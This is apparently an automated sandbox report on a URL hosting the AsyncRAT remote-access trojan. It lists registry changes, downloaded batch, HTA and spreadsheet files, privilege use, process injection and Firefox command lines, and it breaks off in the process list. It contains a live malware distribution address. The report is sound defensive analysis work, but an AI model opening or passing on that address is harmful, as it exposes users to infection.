Malware Analysis Report

2025-01-02 12:09

Sample ID 240419-teaamagd79
Target http://193.222.96.128:7287/
Tags: asyncrat, default, rat
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

Threat Level: Known bad

The file http://193.222.96.128:7287/ was found to be: Known bad.

Malicious Activity Summary

Tags: asyncrat, default, rat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Checks computer location settings

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Opens file in notepad (likely ransom note)

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Modifies registry class

NTFS ADS

Suspicious behavior: GetForegroundWindowSpam

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-04-19 15:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-04-19 15:57
Reported: 2024-04-19 16:03
Platform: win10v2004-20240412-en
Max time kernel: 300s
Max time network: 304s

Command Line

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://193.222.96.128:7287/"

Signatures

AsyncRat
Tags: rat, asyncrat

Async RAT payload
Tags: rat

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A

Enumerates physical storage devices

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e8005398e082303024b98265d99428e115f0000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Program Files\Mozilla Firefox\firefox.exe | N/A

NTFS ADS

Description | Indicator | Process | Target
File created | C:\Users\Admin\Downloads\15.bat:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
File created | C:\Users\Admin\Downloads\index.hta:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
File created | C:\Users\Admin\Downloads\index(1).hta:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
File created | C:\Users\Admin\Downloads\GoGi.bat:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
File created | C:\Users\Admin\Downloads\jiteon.xlsx:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A

Opens file in notepad (likely ransom note)

Tags: ransomware

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A (identical row repeated 64 times)

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A (identical row repeated 54 times)
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A (identical row repeated 3 times)
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (identical row repeated 2 times)
Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A (identical row repeated 5 times)

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A (identical row repeated 10 times)
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A (identical row repeated 14 times)

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3532 wrote to memory of 1716 | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Program Files\Mozilla Firefox\firefox.exe (identical row repeated 11 times)
PID 1716 wrote to memory of 4496 | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Program Files\Mozilla Firefox\firefox.exe (identical row repeated 29 times)
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://193.222.96.128:7287/"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://193.222.96.128:7287/

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.0.748411504\861399078" -parentBuildID 20230214051806 -prefsHandle 1804 -prefMapHandle 1796 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {27fccf99-4260-425d-99f6-3f24e5d01725} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 1884 2e29c70ea58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.1.138431360\1987171567" -parentBuildID 20230214051806 -prefsHandle 2448 -prefMapHandle 2444 -prefsLen 22927 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {890110b5-bc17-4d2c-bc1c-e31324d6da70} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 2476 2e288489058 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.2.40416309\731482835" -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3120 -prefsLen 22965 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f8a09c5-4824-4734-ac39-70b52d034736} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 3076 2e29f63e558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.3.1814357587\895428089" -childID 2 -isForBrowser -prefsHandle 3872 -prefMapHandle 3868 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c418a55c-6c1d-41a8-bf3e-7ffa99b591ac} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 3884 2e28847ae58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.4.1950139730\442656087" -childID 3 -isForBrowser -prefsHandle 5156 -prefMapHandle 5152 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e511be1-32c8-4cc2-847d-6c9ff30d630d} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5004 2e2a296b258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.5.1027841266\366751635" -childID 4 -isForBrowser -prefsHandle 5172 -prefMapHandle 5176 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e45dafc5-ff67-410a-a601-1032514c435c} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5308 2e2a30cc758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.6.495439415\1688938685" -childID 5 -isForBrowser -prefsHandle 5568 -prefMapHandle 5564 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e1c3b01-a8c7-4a97-9079-375a14f935da} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5484 2e2a30cd058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.7.849901555\1470011006" -childID 6 -isForBrowser -prefsHandle 5244 -prefMapHandle 5208 -prefsLen 27737 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf25254b-b9f7-4fd9-a7d9-194410428f3c} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5232 2e2a4158758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

